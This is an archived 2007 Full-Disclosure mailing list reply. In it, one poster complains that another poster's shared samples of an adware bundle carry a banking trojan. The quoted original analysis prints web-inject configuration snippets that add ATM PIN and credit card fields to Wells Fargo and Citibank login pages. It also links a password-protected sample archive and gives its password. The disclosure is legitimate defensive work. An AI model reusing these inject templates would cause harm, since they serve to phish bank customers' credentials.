lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <d609a5d80703131036k5a615b68hde72a03055dc4b16@mail.gmail.com>
Date: Tue, 13 Mar 2007 13:36:10 -0400
From: "Net Tech" <net.tech11@...il.com>
To: full-disclosure@...ts.grok.org.uk, news@...uriteam.com
Subject: Re: Iframe-Cash/Iframe-Dollars Adware
	bundle...oooh... my ....god..

Why is this "genius" sending virus infected attachments to the list?
The Trojan Horse Infostealer.Bancos.Z is attached to his "research data"...
it steals passwords and logs keystrokes entered into certain financial Web
sites.



On 3/12/07, Thierry Zoller <Thierry@...ler.lu> wrote:
>
> Dear list,
>
> Whoever deals with these poeple and thinks they are a benign Adware
> company (and thus spreads their bundles.
>
> Check this :
> Ignoring the fact that they basicaly  install a Rootkit, I attached a
> few files I reversed, they install a DLL that does not directly KEYLOG
> your
> banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking
> page
> asking you to enter more details (like PIN, Magic Password etc), then
> capture that data and transmit it (I did no further investigation)
>
> http://secdev.zoller.lu/system32.zip
> Pass: 123
>
> I am disgusted. They even created their own XML parser for this ...
>
> An extract of HTML code they inject :
> -------------------------------------
> <inject
> url="wellsfargo"
> before="name=userid autocomplete='off'></DIV>"
> what="
> <DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT
> id=pin  tabIndex=2 maxLength=4 type=password size=4 name=pin
> autocomplete='off'></SPAN></DIV>
> "
> block="alt=Go"
> check="pin"
> quan="4"
> content="d"
> >
> </inject>
> ------------------------------------
>
> Attached the main files (pass 123), feel free to add this as HIPS or
> whatever
> signatures, those interested in a complete reversal can contact me
> to receive the EXE in question.
>
> I have no more time feel free to dig deeper.
>
>
> I especialy liked this :
> ------------------------
> <inject
> url="citibank.com"
> <TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE='color:red'>To
> prevent fraud enter your credit card information please:</SPAN></TD></TR>
>
>
> Puke..
>
> --
> http://secdev.zoller.lu
> Thierry Zoller
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ